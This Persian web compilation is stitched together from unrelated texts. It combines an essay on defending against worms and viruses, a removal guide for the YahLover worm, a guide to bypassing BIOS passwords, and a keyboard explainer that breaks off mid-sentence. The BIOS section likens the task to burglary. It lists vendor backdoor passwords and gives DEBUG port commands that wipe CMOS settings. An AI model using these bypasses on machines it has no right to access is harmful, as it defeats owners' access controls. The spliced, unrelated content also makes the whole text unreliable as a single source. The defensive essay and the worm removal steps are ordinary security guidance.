• تکنولوژی حملات بسيار پيشرفته شده و مهاجمان می توانند با اتکاء بر آخرين فنآوری ها ی موجود ، بسادگی از نقاط ضعف موجود در سيستم های آسيب پذير استفاده و به آنان آسيب مورد نظر خود را برسانند( حملات مبتنی بر آخرين تکنولوژی موجود ).
• تعداد زيادی از حملات در حال حاضر بصورت کاملا" اتوماتيک عمل نموده و با سرعت بسيار بالائی در اينترنت و صرفنظر از منطقه جغرافيائی ويا محدوديت های ملی، توزيع و گسترش می يابند.
• تکنولوژی بکارگرفته شده در حملات بسيار پيچيده و در برخی موارد تعمد پنهانی در آنان دنبال می گردد . بنابراين ، کشف و آناليز مکانيزمهای استفاده شده بمنظور توليد پادزهر و برطرف نمودن مشکل ، مستلزم صرف زمان زيادی خواهد بود .
• کاربران اينترنت وابستگی زيادی به اينترنت پيدا کرده و از آن بمنظور انجام کارهای حياتی خود نظير: فعاليت های تجاری Online استفاده می نمايند. کوچکترين وقفه در ارائه خدمات می تواند ازدست دادن منابع اقتصادی و بمخاطره افتادن سرويس های حياتی را بدنبال داشته باشد .

توجه به هر يک از موارد اشاره شده ، شاهدی است بر اين ادعا که ما همچنان  در معرض طيف گسترده ای از حملات قرار گرفته ايم . حملاتی که از دست دادن منابع اقتصادی و عدم امکان عرضه سرويس ها را بدنبال خواهد داشت .در اين راستا می بايست از تمامی امکانات و پتانسيل های موجود بمنظور سرعت در پاسخ و برخورد با حملات استفاده نمود. بازنگری در راه حل ها ی موجود و استفاده از رويکردهای علمی و جامع می تواند عاملی موثر در جهت برخورد مناسب با حملات باشد.

وظايف مديران سيستم 
شناسائی تهديدات کرم ها و ويروس ها عمليات ساده و ايستائی نبوده و در اين رابطه می بايست از رويکردهای کاملا" پويا و مبتنی بر آخرين دستاوردهای تکنولوژی استفاده گردد. با کشف بيش از چهار هزار نوع نقطه آسيب پذير در طی هر سال  ، مديران سيستم و شبکه در وضعيت دشواری قرار دارند . آنان با چالش های جدی در ارتباط با تمامی سيستم ها ی موجود و Patch های مورد نظر که برای برطرف نمودن نقايص امنيتی ارائه می گردد ، مواجه می باشند . استفاده و بکارگيری  Patch ها ی ارائه شده در عين مفيد بودن بمنظور مقابله با مشکل امنيتی ايجاد شده ، می تواند زمينه بروز مسائل و اثرات جانبی غيرقابل پيش بينی را فراهم نمايد . در اين رابطه لازم است به اين نکته مهم نيز اشاره گردد که پس از ارائه يک Patch امنيتی  ، مدت زمان زيادی طول خواهد کشيد که مديران سيستم و يا شبکه مشکل تمامی سيستم های آسيب پذير خود را برطرف نمايند. مدت زمان برطرف سازی مشکلات و اشکالات بوجود آمده در برخی موارد می تواند ماه ها ويا حتی سالها  پس از ارائه patch پياده سازی شده ،بطول می انجامد . مثلا" هنوز گزاشاتی در رابطه با ويروس مليزا که چهار سال از فعال شدن آن گذشته است ، توسط برخی سازمان ها و موسسات در سطح جهان ارائه می گردد. ريشه کن نمودن يک کرم و يا ويروس شايع ، با توجه به گستردگی اينترنت ، عملياتی نيست که در يک بازه زمانی محدود، بتوان موفق به انجام آن گرديد ومی بايست برای نيل به موفقيت فوق ،  زمان زيادی صرف گردد .
شايد اين سوال مطرح گردد که دلايل اينهمه تاخير در ريشه کن نمودن يک ويروس و يا کرم چيست ؟ در پاسخ می توان به موارد متعددی نظير صرف زمان زياد ، پيچيدگی گسترده آنان و عدم اختصاص اولويت مناسب برای مقابله با آنان در يک سازمان و يا موسسه ، اشاره نمود.متاسفانه ، بسياری از مديران شناخت کامل و جامعی نسبت به تهديدات نداشته و هرگز به مقوله امنيت با يک اولويت سطح بالا نگاه نکرد و حتی منابع لازم را به اين مقوله اختصاص نمی دهند. علاوه بر اين ، سياست های تجاری در برخی موارد سازمان ها را بسمت انتخاب  يکی از دو گزينه : اهداف تجاری و نيازهای امنيتی  هدايت که در اکثر موارد رسيدن به اهداف تجاری دارای اولويت و جايگاه بالاتری برای آنان می باشند. علاوه بر تمامی مسائل فوق، می بايست به اين نکته مهم نيز اشاره گردد که تقاضا برای مديران سيستم ورزيده و کارشناس بيش ازميزان موجود بوده  و همين امر همواره استفاده از متخصصين و کارشناسان امنيتی را با مشکل جدی مواجه می سازد( عدم توازن بين عرضه و تقاضا) .
بمنظور برخورد مناسب با وضعيـت فوق ، مديران سيستم در يک سازمان می توانند با دنبال نمودن مراحل زير عمليات لازم در جهت تسهيل در امر حفاظت سيستم های سازمان را انجام دهند:

• اتخاذ روش های امنيتی .انتخاب سيستم های ارزيابی امنيت اطلاعات ، مديريت سياست ها و تبعيت از روش های امنيتی برای تمامی سازمان ها (بزرگ و کوچک ) امری حياتی است . سازمان ها و موسسات می توانند بر اساس وضعيت موجود خود ، يکی از روش های مناسب امنيتی را انتخاب نمايند. در اين راستا می توان از پتانسيل ها و تجارب بخش دولتی و يا خصوصی استفاده گردد. در اين رابطه می توان از منابع متعدد اطلاع رسانی موجود بمنظور اتخاذ سياست های کلی امنيتی استفاده و پس از بررسی آنان نسبت به تدوين و پياده سازی سياست امنيتی در سازمان مربوطه ، اقدام نمود.
• بهنگام نمودن دانش و اطلاعات . مديران سيستم می بايست بمنظور ارتقاء سطح دانش و معلومات خود ، دوره های آموزشی خاصی را بگذرانند . شرکت در دوره های آموزشی مستمر و اختصاص وقت لازم برای استفاده مفيد از دوره های آموزشی می بايست در دستور کار مديران سيستم در سازمان ها و موسسات قرار گيرد . مديران سيستم لازم است ضمن آشنائی با آخرين تهديدات و حملات با ابزارهای لازم در جهت افزايش حفاظت سيستم ها نيز شناخت مناسبی را پيدا نمايند .لازم است به اين نکته مهم اشاره گردد که امنيت ، دارای ماهيتی کاملا" پويا بوده که همزمان با بروز حملات جديد و شناسائی نقاط آسيب پذير جديد بصورت روزانه تغيير و ارتقاء می يابد. با دانش استاتيک و محدود نمی توان با مقوله های پويا و گسترده برخوردی مناسب و علمی داشت .
• آموزش کاربرانی که از سيستم ها استفاده می نمايند . مديران سيستم می بايست برنامه های آموزشی خاصی را در رابطه با امنيت ، بمنظور ارتقاء دانش کاربران نسبت به مسائل امنيتی ، ارائه نمايند. دوره ها و برنامه های آموزشی می بايست کاملا" هدفمند بوده و کاربران پس از شرکت وگذراندن دوره های فوق ، به سطح مطلوبی از توانائی بمنظور تشخيص يک مسئله ، انجام عمليات لازم بمنظور افزايش حفاظت سيستم، برخورد مناسب در صورت مواجه با يک مشکل امنيتی دست پيدا کرده باشند . بمنظور پياده سازی سياست امنيتی در يک سازمان ،وجود کاربران آگاه با مسائل ايمنی اطلاعات و حفاظت از اطلاعات حساس ، امری ضروری و لازم است .

وظايف ارائه دهندگان تکنولوژی 
مديران سيستم با دنبال نمودن پيشنهادات ارائه شده،  صرفا" قادر به حل بخش هائی از مسئله امنيـت اطلاعات می باشند. با توجه به جايگاه شرکت های ارائه دهنده تکنولوژی، حرکات و تدابير مثبت آنان می تواند تاثير زيادی در جهت ممانعت و گسترش کرم ها و ويروس ها  را بدنبال داشته باشد . با اينکه برخی شرکت ها بسمت ارتقاء و بهبود امنيت در محصولات خود حرکت نموده اند ، ولی هنوز راهی طولانی در پيش است . متاسفانه ، پياده کنندگان نرم افزار از تجارب گذشته در رابطه با نقايص امنيتی در ارائه نسخه ها ی جديد نرم افزار خود استفاده نمی نمايند. بر اساس مطالعات انجام شده ، مشاهده شده است که برخی از نقاط آسيب پذير جديد در نسخه های جديد برخی محصولات در نسخه های قبلی هم وجود داشته و تلاش مناسبی در جهت  بهسازی وضعيت امنيتی نسخه جديد صورت نگرفته است .
وجود برخی از نقاط آسيب پذير بدليل عدم  پيکربندی ايمن سيستم های عامل و برنامه های کاربردی است . محصولات فوق ، بسيار پيچيده بوده و اغلب با غير فعال نمودن برخی از ويژگی ها ی امنيتی به مشتريان عرضه می شوند .شرکت های ارائه دهنده بر اين اعتقاد می باشند که همزمان با استفاده از محصول ارائه شده ، کاربران می توانند ويژگی های امنيتی غير فعال شده را در زمان لازم و بدلخواه خود فعال نمايند. بدين ترتيب تعداد زيادی از سيستم های متصل شده به  اينترنت  دارای پيکربندی مناسب در رابطه با امنيت اطلاعات نبوده و شرايط مناسبی را برای نفوذ کرم ها و ويروس ها  فراهم می نمايند.
ارائه محصولاتی که در مقابل کرم ها و ويروس ها نفوذناپذير باشند ، برای هر شرکت ارائه کننده محصولات ،امری ضروری و حياتی است . اعتقاد به اين رويکرد امنيتی که " کاربر می بايست مواظب باشد " ،  در عصر حاضر پذيرفتنی نيست ، چراکه  سيستم ها  بسيار پيچيده بوده و سرعت حملات نيز باورنکردنی است و در برخی موارد فرصت مناسب برای برخورد با نقص امنيتی از کاربر سلب می گردد . توليد کنندگان محصولات می توانند با اتکاء و استفاده از روش های مهندسی نرم افزار تلاش خود را در جهت توليد محصولات مقاوم در برابر حملات ، مضاعف نمايند . در اين راستا موارد زير پيشنهاد می گردد :

• نرم افزار ضد ويروس / مقاوم در مقابل ويروس . کامپيوترها و نرم افزارها دارای امکانات ذاتی بمنظور ايمن شدن در مقابل تهديدات و حملات کرم ها و ويروس ها نمی باشند. طراحی کامپيوترها و يا نرم افزارهای کامپيوتری بگونه ای است که امکان توزيع و انتشار ويروس ها و آلودگی سيستم ها را فراهم می نمايد. در برخی موارد طراحی انجام شده بگونه ای است که شرايط لازم برای حملات و نفوذ کرم ها و ويروس ها را فراهم و استعداد فوق در بطن محصول ارائه شده وجود خواهد داشت . اجراء يک کد نامشخص و وارده از يک منبع ناشناس و گمنام نمونه ای از استعداد اشاره شده در بطن محصولات بوده که امکان فعال شدن يک کد اجرائی بدون محدوديت و نظارت خاصی بر روی يک ماشين ، فراهم می گردد.بدين ترتيب سيستم در مقابل حملات ويروس ها آسيب پذير و لازم است توليد کنندگان، سيستم ها و نرم افزارهای خود را بگونه ای ارائه نمايند که باعث محدوديت در اجرای کدهای وارده ، خصوصا" کدهائی که از منابع تائيد نشده و ناشناخته سرچشمه می گيرند، گردند. در اين رابطه می توان از روش های شناخته شده و مبتنی بر مهندسی نرم افزار متعددی استفاده نمود.
• کاهش خطاء پياده سازی . اکثر نقاط آسيب پذير موجود در محصولات از خطاهای موجود در مرحله پياده سازی نرم افزار، ريشه می گيرد. اين نوع خطاها در محصولات باقی مانده و شايد منتظرند که در زمان بکارگيری نرم افزار شناسائی گردند ! تشخيص و برطرف نمودن اين نوع خطاها ، صرفا" زمانی ميسر می گردد که محصول در حال استفاده و کاربری است . در موارد زيادی ، نقايص امنيتی مشابه بصورت پيوسته در نسخه های جديد محصولات، مجددا" مشاهده و کشف می گردد.مهمترين علت بروز اينگونه نقاط آسيب پذير، طراحی سطح پائين و يا عدم برخورد مناسب با خطاها در زمان پياده سازی است . توليدکنندگان و ارائه دهندگان محصولات نرم افزاری لازم است با مطالعه و بررسی اشتباهات گذشته و بکارگيری روش های موثر موجود در مهندسی نرم افزار سعی در کاهش حفره ها و نقايص امنيـی در محصولات خود نمايند .
• پيکربندی پيش فرض با امنيت بالا . امروزه با توجه به پيچيدگی محصولات نرم افزاری ، پيکربندی مناسب سيستم ها و شبکه ها بمنظور استفاده از تدابير امنيتی پيش بينی شده ، امری دشوار بنظر می رسد . حتی در برخی موارد افراديکه دارای مهارت های فنی قابل قبولی بوده و آموزش های لازم را نيز فراگرفته اند ، بمنظور استفاده و بکارگيری امکانات امنيتی در يک محصول نرم افزاری، دارای مشکلات خاص خود می باشند.اشتباهات کوچک می تواند سيستم ها را در معرض تهديد و کاربران را با حملات غير قابل پيش بينی مواجه نمايد. توليد کنندگان و ارائه دهندگان تکنولوژی می توانند محصولات خود را با پيکربندی پيش فرض ايمن،ارائه نمايند . در چنين مواردی اکثر گزينه ها و امکانات امنيتی موجود ، بصورت پيش فرض و در زمان نصب فعال خواهند بود. بدين ترتيب کاربران در آغاز استفاده از يک محصول نيازمند تغييرات خاصی در رابطه با پيکربندی محصول نداشته و در ادامه و در صورت ضرورت ،می توانند پيکربندی های پيش فرض را متناسب با خواسته خود تغيير نمايند . بنابراين ، کاربران با يک سطح امنيتی قابل قبول استفاده از محصول را آغاز می نمايند.

وظايف تصميم گيرندگان 
تصميم گيرندگان در يک سازمان ، موسسه و ساير بخش ها ی کلان يک کشور، می توانند بمنظور افزايش امنيت از رويکردهای متفاوتی استفاده نمايند . در اين راستا موارد زير پيشنهاد می گردد :

• تقويت انگيزه های لازم برای ارائه محصولات با ايمنی بيشتر و کيفيت بالا . بمنظور ترغيب ارائه دهندگان بمنظور توليد محصولات باکيفيت و ايمنی مناسب ، پيشنهاد می گردد که تصميم گيرندگان از قدرت خريد خود بمنظور تقاضای نرم افزار با کيفيت بالا استفاده نمايند . در هنگام تهيه نرم افزار و عقد قرارداد مربوطه می بايست عبارت " کد بی نقص " با صراحت در متن قرارداد آورده شود. بدين ترتيب توليد کنندگان و ارائه دهندگان محصولات در مواردی که نقايص خاصی نظير نقايص امنيتی در محصول مربوطه تشخيص و کشف می گردد ، ملزم به رفع عيب و اشکال موجود خواهند بود. پايبندی به رويکرد فوق ، انگيزه های مناسبی را برای توليدکنندگان ايجاد و هر توليد کننده که محصول بی نقصی را توليد و ارائه نمائيد ، شانس موفقيت بيشتری را خواهد داشت .
  دراين رابطه لازم است ، تصميم گيرندگان با مسائل متعددی همچون فرآيندهای تهيه يک محصول آشنا و بصورت مستمر اطلاعات خود را نيز ارتقاء تا بتوانند در زمان لازم تصميمات منطقی و مبتنی بر دانش را برای تهيه يک محصول اتخاذ نمايند.بمنظور حمايت از چنين فرآيندهائی، تهيه کنندگان می بايست آموزش های لازم در خصوص نظارت ، سياست های امنيتی ، اصول و مفاهيم امنيتی و معماری مربوطه را فرا بگيرند .بهرحال هدف ، تهيه و بکارگيری سيستمهائی است که با روح يک سازمان مطابقت و افزايش کارآئی و بهره وری را بدنبال داشته باشند .
• تحقيق در رابطه با تضمين ايمن سازی اطلاعات . تصميم گيرندگان ، می بايست همواره بدنبال راه حل های تکنيکی بمنظور افزايش ضريب امنيت اطلاعات بوده و در اين راستا لازم است تحقيقات گسترده و سازمان يافته ای را بمنظور آگاهی از روش های کنشگرايانه وپيشگيرانه در دستور کار خود قرار دهند ( استفاده از روش های واکنشی و انفعالی به تنهائی کفايت نخواهد کرد) . بنابراين ، تصميم گيرندگان می بايست از يک برنامه منسجم تحقيقاتی حمايت تا بکمک آن بتوان با رويکردهای جديد در ارتباط با امنيت اطلاعات و سيستم آشنا گرديد.رويکردهای فوق ، شامل طراحی و پياده سازی استراتژی ها ، روش های بازسازی اطلاعات ، استراتژی های مربوط به مقاومت در مقابل تهاجمات ، آناليزهای مستمر و پياده سازی معماری های امنيتی باشد . از جمله فعاليت هائی که می بايست در اين خصوص مورد توجه و برای آنان راهکارهای مناسب ايجاد گردد، عبارتند از :
  - ايجاد يک چارچوب يکپارچه و يکنواخت برای آناليز و طراحی تضمين اطلاعات
  - ايجاد روش های مستحکم و مطمئن بمنظور دستيابی و مديريت خطرات برخا سته از تهديد سرمايه های اطلاعاتی
  - ايجاد روش های ارزيابی بمنظور مشخص کردن و بدست آوردن نسبت هزينه / مزيت ، استراتژی های ريسک
  - ايجاد و استفاده از تکنولوژی های جديد بمنظور مقاومت در برابر حملات ، تشخيص حملات و بازيابی خرابی ها
  - ايجاد روش های سيستماتيک و ابزارهای شبيه سازی برای آناليز حملات ، تصادمات و خرابی بين سيستم های وابسته
• استفاده از متخصصين فنی بيشتر . تصميم گيرندگان ، می بايست از مراکز امنيتی بمنظور ارتقاء سطح دانش عمومی امنيت حمايت نموده تا از اين طريق بتوان کارآموزان و دانشجويان را جذب و با تدوين يک برنامه آموزشی هدفمند نسبت به تربيت کارشناسان ماهر امنيتی اقدام نمود .بديهی است استفاده از کارشناسان فوق ، بمنظور ايمن سازی سيستم ها و شبکه امری ضروری و اجتناب ناپذير است . برنامه های آموزشی تدوين شده در فواصل زمانی خاصی می بايست بازنگری تا بتوان افرادی را تربيت که همواره پاسخگوی نيازهای امنيتی در سطح سازمان ها و موسسات بوده و با دانش روز نيز کاملا" آگاه باشند.
• ارائه آموزش و آگاهی لازم به کاربران اينترنت : دستيابی آسان و وجود اينترفيس های مناسب ، باعث شده است که کاربران با هر نوع شرايط سنی از اينترنت در تمامی سطوح زندگی استفاده نمايند.تعداد زيادی از کاربران اينترنت دارای شناخت اندکی نسبت به تکنولوژی اينترنت و يا روش های امنيتی لازم برای استفاده ، می باشند . تصميم گيرندگان ، می توانند با دنبال نمودن پيشنهادات زير ، سطح دانش کاربران اينترنت را افزايش دهند :
  - طراحی و پياده سازی برنامه ها و مواد آموزشی لازم در خصوص ارتقاء سطح دانش عمومی تمامی کاربران اينترنت .آموزش و افزايش آگاهی کابران در خصوص : خصايص امنيتی ، تهديدات ، فرصت ها و رفتار مناسب در اينترنت به امری ضروری و حياتی تبديل شده است . در اين رابطه لازم است به اين نکته مهم اشاره گردد که بقاء سيستم وابسته به امنيت سيستم ها در سمت ديگر بوده و حل مشکل سيستم خود به تنهائی کافی نخواهد بود و در اين رابطه لازم است به تمامی کاربران در خصوص نحوه استفاده از کامپيوترهای خود با لحاظ نمودن پارامترهای ايمنی و امنيتی ، آموزش های لازم و مستمر ارائه گردد .علاوه بر موارد فوق ، لازم است به مصرف کنندگان محصولات نرم افزاری آموزش های خاصی در رابطه با نحوه تهيه و نصب نرم افزارهای ايمن ارائه گردد . بدين ترتيب توليدکنندگان محصولات نرم افزاری ترغيب به ارائه محصولات خود با نقاط آسيب پذيری کمتر خواهند شد .
  - طراحی و پياده سازی برنامه های آموزشی خاص در زمينه استفاده مناسب و اوليه از کامپيوتر . آموزش های فوق ، می بايست بهمراه آموزش های عمومی ارائه و نحوه استفاده از کامپيوتر بدرستی تبين گردد . اين نوع از آموزش ها را می توان از سطوح پائين آموزشی ، آغاز نمود. کاربران نوجوان و جوان اينترنت می بايست نسبت به رفتارهای درست و ناشايست در زمان استفاده از کامپيوتر خصوصا" در زمان استفاده از اينترنت بدرستی توجيه و آموزش های لازم به آنان ارائه گردد .( مشابه آموزش های ارائه شده به کودکان در زمان استفاده از کتابخانه ها ، چه نوع رفتاری قابل قبول است و چه نوع رفتاری پذيرفتنی نيست ) معلمان مدارس و والدين نيز می بايست در اين رابطه آموزش های لازم را فراگرفته تا از يکطرف قادر به رفتاری قابل قبول در زمان استفاده از کامپيوتر وشبکه های کامپيوتری خصوصا" اينترنت بوده و از طرف ديگر و در جايگاه خود بتوانند نظارت لازم را انجام دهند .

خلاصه
وابستگی ما به سيستم های کامپيوتری بهم مرتبط  خصوصا" اينترنت ، بسرعت در حال افزايش بوده  و حتی بروز اختلال اندک توسط ويروس ها و کرم ها می تواند پيامدهای ناگواری را بدنبال داشته باشد . راه حل های واکنشی استفاده شده برای مقابله با کرم ها و ويروس ها به تنهائی کفايت نخواهد کرد. افزايش قدرت و سرعت حملات باعث شده است که  زيرساخت های اطلاعاتی  در معرض تهديد و خطر قرار داشته باشند. با دنبال نمودن راه حل های موجود می توان سطح مناسبی از حفاظت در مقابل تهديدات را ايجاد نمود. بمنظور ارتقاء و بهبود وضعيت موجود ، مديران سيستم ، ارائه دهندگان تکنولوژی  و تصميم گيرندگان می توانند با رعايت و پيگيری برخی اصول اوليه ، زمينه برخورد با کرم ها و يا ويروس ها را از ابعاد متفاوت فراهم نمايند. تغيير در طراحی نرم افزارها ، روش های پياده سازی ، افزايش تعداد مديران سيستم آموزش ديده  ، بهبود سطح آگاهی کاربران ، افزايش تحقيقات در رابطه با سيستم های ايمن و پايدار، طراحی و پياده سازی دوره های آموزشی خاص دررابطه با کامپيوتر و امنيت شبکه ، نمونه هائی در اين زمينه بوده  که می تواند دستاوردهای مثبتی را در ارتباط با امنيت اطلاعات برای تمامی شهروندان اينترنت بدنبال داشته باشد.حرکات مثبت هر يک از شهروندان اينترنت ( حقوقی و يا حقيقی ) در خصوص پايبندی به اصول امنيتی ، تاثيری مثبت در ايمن سازی سرمايه های اطلاعاتی  را بدنبال خواهد داشت

W32/YahLover.worm

Type

Virus

SubType

Worm

Discovery Date

09/05/2006

Length

Minimum DAT

4845 (09/05/2006)

Updated DAT

4855 (09/19/2006)

Minimum Engine

4.4.00

Description Added

09/18/2006

Description Modified

09/18/2006 9:34 PM (PT)

نحوه انتقال و علایم حاصل از آلودگی به آن :

شما پس از آلودگی به این ویروس به تمام لفرادی که در لیست دوستان خود در yahoo messenger دارید به صورت اتوماتیک وار پیغامی ارسال می نمایید که آدرس سایتی را نشان می دهد که در صورت رفتن به آن آلودگی به دوستانتان منتقل خواهد شد . این کرم در چند روز اخیر بیشتر رایانه های دنیا را مورد تهدید قرار داده است .

راه برطرف کردن مشکل :

در صورت آلودگی کامپیوترتان به این ویروس کارهای زیر را انجام دهید تا از شر این کرم رهایی یابید :

1- دایرکتوری که ویندوزتان در آن قرار دارد رفته و فایل زیر را حذف نمایید ":

WINDIR% askmng.exe

2- از منوی start به قسمت run بروید . در آنجا تایپ نمایید regedit

صفحه ای برای شما باز می شود به قسمتهای زیر رفته و بخشی را که با خطوط قرمز

مشخص ده حذف نمایید .

• hkey_local_machinesoftwaremicrosoftwindowscurrentversion un
  ask manager="%WINDIR% askmng.exe"
• hkey_current_usersoftwaremicrosoftwindowscurrentversion
• policiessystemdisableregistrytools="1"
• hkey_current_usersoftwaremicrosoftwindowscurrentversion
• policiessystemdisabletaskmgr="1"
• hkey_current_usersoftwareyahoopagerviewymsgr_launchcastcontent url=http[dot]//chendang.net[blocked]
• hkey_current_usersoftwareyahoopagerviewymsgr_buzzcontent
  url=http[dot]//chendang.net[blocked]
• hkey_current_usersoftwaremicrosoftinternet explorermainstart
  page=http[dot]//chendang.net[blocked]
• hkey_current_usersoftwaremicrosoftinternet explorermain
  window title="[Random]"

به این ترتیب کامپیوتر شما از شر این کرم خلاصی می یابد .

روش اول: برای دزدی از یک مکان ساده ترین و اولین کار استفاده از شاه کلید است تا آبرومندانه و ترو تمیز وارد شوید و آخرین راه حل بالا رفتن از دیوار است. در این مورد هم اینچنین است ما برای مارک ها و مدلهای مختلف Bios رمزهای عبوری معرفی می کنیم که امیدواریم مشکل شما را حل کند و نیازی به بالا رفتن از دیوار نداشته باشید.

AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet

AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder

رمزهای عبور زیر را بر هر نوع Bios میتوانید امتحان کنید :

LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj

توجه داشته باشید که هنگام وارد کردن رمزهای عبور حروف بزرگ را بصورت بزرگ و حروف کوچک را بصورت کوچک وارد کنید.

روش دوم: یک روش نرم افزاری برای پاک کردن رمز عبور
اگر هنگامی که کامپیوتر روشن است بدان دسترسی دارید میتوانید از برخی نرم افزارهای موجود برای پاک کردن رمزعبور استفاده کنید ولی از آنجا که ممکن است شما به این نرم افزار ها دسترسی نداشته باشید روش زیر را به شما معرفی میکنیم.
کامپیوتر را به حالت MS DOS برگردانید و دستور DEBUG را اجرا کنید
برای مدلهای مختلف BIOS عبارات زیر را وارد کنید :

AMI/AWARD BIOS :
O 70 17
O 71 17
Q

PHOENIX BIOS :
O 70 FF
O 71 17
Q

GENERIC
Invalidates CMOS RAM.
O 70 2E
O 71 FF
Q

توجه کنید که حرف اول برابرحرف O است نه عدد صفر.

روش سوم: روش سخت افزاری
اگر هنگامی که کامپیوتر روشن است به آن دسترسی ندارید یا رمز عبورهای قبلی کارساز نبود می توانید از روشهای سخت افزاری زیر استفاده کنید.
● استفاده از Jumper ها
بر روی تمام مادربردها یک Jumper است که از آن برای پاک کردن CMOS میتوانید استفاده کنید.کنار این jumper معمولا این عبارت دیده میشود Clr CMOS.
تنها کاری که شما میکنید این است که jumper را از پایه 1و2 درآورده و به پایه 3و4 نصب کنید و دوباره به حالت اول برگردانید. شما به همین سادگی میتوانید رمز عبور را پاک کنید.
● در آوردن باتری
میتوانید باتری دستگاهتان را که روی مادربرد است درآورده و دوباره جا بیاندازید در این حالت تمام اطلاعات CMOS به حالت پیش فرض برمیگردد. ولی توجه داشته باشید که جا انداختن باتری کمی مشکل است.
● عوض کردن آی سی ( Cheap CMOS )
اگر هیچ یک از روشهای بالا جواب نداد میتوانید آی سی CMOS را با یک آی سی از همان نوع عوض کنید یا از نوع برنامه ریزی کنید اینکار ابزار مخصوصی دارد و شرکتهای تعمیر کامپیوتر برای شما اینکار را خواهند کرد.

توجه: برای پیدا کردن آی سی CMOS میتوانید به دفترچه مادربرد خود مراجعه کنید.
در این روشها علاوه بر اینکه رمز عبور را پاک میکنید سایر اطلاعات نیز به حالت اولیه برمیگرد ولی نگران نباشید مشکلی نیست و شما میتوانید دوباره مشخصات کامپیوتر خود را در Setup وارد کنید.

صفحه کليد، متداولترين وسيله ورود اطلاعات در کامپيوتر است .عملکرد صفحه کليد مشابه يک کامپيوتر است!

صفحه کليد شامل مجموعه ای از سوييچ ها است که به يک ريزپردازنده متصل می گردند. ريزپردازنده وضعيت هر سوئيچ را هماهنگ و واکنش لازم  در خصوص تغيير وضعيت يک سوئيچ را از خود نشان خواهد داد.

انواع صفحه کليد

صفحه کليدها از بدو استفاده در  کامپيوتر، تاکنون کمتر دستخوش تغييراتی شده اند. اغلب تغيرات اعمال شده در رابطه با صفحه کليد، افزودن کليدهائی خاص ، بمنظور انجام خواسته های مورد نظر است . متداولترين نوع صفحه کليدها عبارتند از :

• § صفحه کليد پيشرفته با 101 کليد
• § صفحه کليد ويندوزبا 104 کليد
• § صفحه کليد استاندارد اپل با 82 کليد
• § صفحه کليد پيشرفته اپل با 108 کليد

کامپيوترهای laptop دارای صفحه کليدهای مختص بخود بوده که آرايش کليدها بر روی آنان با صفحه کليدهای استاندارد متفاوت است . برخی از توليد کنندگان صفحه کليد،  کليدهای خاصی را نسبت به صفحه کليدهای استاندارد اضافه نموده اند.  صفحه کليد  دارای چهار نوع  کليد متفاوت است :

• § کليدهای مربوط به تايپ
• § کليدهای مربوط به بخش اعداد (Numeric keypad)
• § کليدهای مربوط به توابع ( عمليات ) خاص
• § کليدهای کنترلی

کليدهای تايپ بخشی از صفحه کليد را شامل می گردنند که بکمک آنها می توان حروف الفبائی را تايپ نمود. آرايش کليدهای فوق بر روی صفحه کليد مشابه دستگاههای تايپ است . همزمان با گسترش استفاده از کامپيوتر در بخش های تجاری ضرورت وجود کليدهای خاص عددی برای بهبود سرعت ورود اطلاعات نيز احساس گرديد، بدين منظوور Numeric keypad در صفحه کليدها مورد استفاده قرار گرفت . با توجه به اينکه حجم بالائی از اطلاعات بصورت عدد می باشند ، يک مجموعه با 17 کليد به صفحه کليد اضافه گرديد. آرايش کليدهای فوق بر روی صفحه کليد مشابه اغلب ماشين های حساب است . در سال 1986 شرکت IBM صفحه کليد اوليه خود را تغيير و کليدهای عملياتی و کنترلی را به آن اضافه کرد. کليدهای عملياتی بصورت يک سطر و در بالاترين قسمت صفحه کليد قرار می گيرند.  با استفاده از نرم افزارهای کاربردی و يا سيستم عامل می توان به هر يک از کليدهای عملياتی مسئوليتی را واگذار نمود. کليدهای کنترلی باعث کنترل مکان نما (Cursor) و صفحه نمايشگر می باشند. در اين راستا از چهار کليد ( با فرمت معکوس حرف T ) بين بخش مربوط به کليدهای مختص تايپ و بخش عددی صفحه کليد استفاده شده است. با استفاده از کليدهای فوق کاربران قادر به حرکت مکان نما بر روی صفحه نمايشگر خواهند بود. در اغلب نرم افزارها با استفاده از کليدهای کنترلی کاربران قادر به پرش هائی با گام های بلند نيز خواهند بود. اين کليدها شامل موارد زير می باشد :

• § Home
• § End
• § Insert
• § Delete
• § Page Up
• § Page Down
• § Control (Ctrl)
• § Alternate (Alt)
• § Escape (Esc)

صفحه کليد ويندوز، کليدهای اضافه ای را معرفی نمود. کليدهای Windows يا Start و يک کليد Application نمونه هائی در اين زمينه می باشند.  صفحه کليدهای " اپل " اختصاص به سيستم های مکينتاش دارد. شکل زير يک نمونه از صفحه کليدهای فوق را نشان می دهد:

صفحه کليد از نمای نزديک

پردازنده موجود در يک صفحه کليد ، بمنظور عملکرد صحيح صفحه کليد، می بايست قادر به شناخت و آگاهی از چندين موضوع باشد. مهمترين اين موضوعات عبارتند از :

• § آگاهی از موقعيت کليد در ماتريس کليد ها ( مدار ماتريسی )
• § ميزان جهش ( Bounce ) کليد و نحوه فيلتر نمودن آن
• § سرعتی که اطلاعات برای typematics ارسال می گردند.

مدارماتريسی کليد ها ، يک شبکه ازمدارات بوده و در زيرکليد ها قرار دارد.در تمام صفحه کليدها، هر مدار در نقطه مربوط به يک کليد خاص، شکسته می گردد.با فشردن يک کليد فاصله موجود بين مدار حذف و امکان ايجاد يک جريان ضعيف بوجود می آيد. پردازنده وضعيت هر يک از کليدها را از بعد پيوستگی در نقطه تماس مدار مربوطه،  بررسی می کند. زمانيکه تشخيص داده شد که يک مدار بسته شده ( اتصال برقرار است ) است، مقايسه بين محل کليد مورد نظر با " طرح کاراکترهای" (bitmap)  موجود در حافظه ROM انجام می گيرد. طرح کاراکترها، يک چارت مقايسه ای برای پردازنده بوده تا به وی اعلام گردد، کدام کليد در مختصات X,Y  در مدارماتريسی کليد ها ، قرار دارد.در صورتيکه بيش از يک کليد  بصورت همزمان فعال شده باشد پردازنده بررسی خواهد کرد که آيا ترکيب کليدهای فشرده شده دارای يک طرح کاراکتر است . مثلا" در صورت فشردن  کليد a ، حرف a برای کامپيوتر ارسال می شود.در صورتيکه کليد shift را نگاهداشته و کليد a را فعال نمائيم پردازنده ترکيب فوق را با طرح  